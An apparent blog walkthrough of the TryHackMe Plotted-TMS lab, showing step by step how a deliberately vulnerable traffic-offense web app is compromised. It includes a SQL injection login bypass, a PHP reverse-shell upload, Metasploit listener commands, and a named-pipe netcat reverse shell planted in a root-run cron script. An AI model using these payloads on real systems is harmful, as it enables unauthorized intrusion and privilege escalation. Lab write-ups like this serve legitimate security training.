Plotted-TMS is an easy room but Everything here is plotted! Hacking a Traffic Offense Management System.

TryHackMe Plotted-TMS
TryHackMe Plotted-TMS

First let’s scan the IP and find some information to work.

Eumerate , enumerate enumerate

Enumeration

Detect open ports:

nmap -sC -sV plotted.thm

After running nmap we detect three open ports 22-80-445, if you pay atention the port 445 is not a Samba server but an HTTP server running Apache.

At this point we have:

  • 1 SSH Server (22)
  • 2 HTTP Servers (80-445)

Both webservers show the Apache default webpage, its time to enumerate the webserver and find some juice.

Find folders and files on Webservers

dirb http://plotted.thm

Port 80 has nothing, you can check on next image.

Plotted-TMS: Complete TryHackMe walkthrough 23

We have another port to investigate, port 445.

dirb http://plotted.thm:445
firefox http://plotted.thm:445/management
TOMS homepage

Great we found a Traffic Offense Management System webapp to investigate and a link to the login system.

login system

Great we have a PHP login page, here I ‘ve try the common admin:admin but it fails. So its time to sqli, after a few manually tests I am In!

admin' or 1+1--'
bypass login system

Cheking the profile page is possible to upload a profile image, or maybe a reverse shell? 😀

Learn how to generate metasploit payloads!

profile page

You can use sqlmap the usename parameter is vulnerable.

Getting Low Level User Shell – www-data

Upload a PHP reverse shell into the profile picture and open a netcat listener on port 1234, open the image and you have a shell.

Here I describe two options, using netcat or msfconsole, usually I use msfconsole to be able to execute other procedures on the remote system and to be more easy to upgrade to a metrepeter shell.

msfconsole -q -x "use multi/handler; set payload generic/shell_reverse_tcp; set lhost 10.8.154.49; set lport 1234; exploit"
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 10.10.181.46
lhost => 10.10.181.46
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > run
firefox http://10.10.114.80:445/management/uploads/1645711140_rshell.php
msfconsole reverse shell
nc -lnp 1234
reverse shell

Stabilize the shell:

python3 -c "import pty;pty.spawn('/bin/bash')"
stabilized shell
export TERM=xterm

Now is time to escalate our priviliges, I will run Linpeas and check the output

Escalate to High privilege user(plot_admin)
running linpeas

And lianpeas found our entry point, a cron job running a script as plot_admin.

Lets verify our permissions on that folder.

ls -la /var/www/

The scripts folder is owned by our user/group and is great we can create stuff inside or manipulate whats inside.

ls -la /var/www/scripts

As we can see we have a script owned by user plot_admin.

Let’s think a little bit.

We are the owners of a folder and someone create a script inside – do we have a permissions to write into that script?

Check the cronjob output it tell us it will be running as plot_admin user. So?

If we change the content of the script to a bash reverse shell it will be executed as plot_admin user.

Let’s see!

user www-data
mv /var/www/scripts/backup.sh /var/www/scripts/backup_rfs.sh 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.44.169 4444>/tmp/f
nc -lp 1234
chmod 777 /var/www/scripts/backup.sh
User FLAG
cat /home/plot_admin/user.txt
Escalate to Root

TryHackMe Plotted-TMS PWNED

doas -u root openssl enc -in /root/root.txt
doas -u root openssl enc -in /root/root.txt
Congratulations on completing this room!

53f85e-RFS-040a9bdcab

Hope you enjoyed the journey!

Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888

TryHackMe Plotted-TMS

old, Hacking Playgrounds, TryHackMe
Tagged in:
,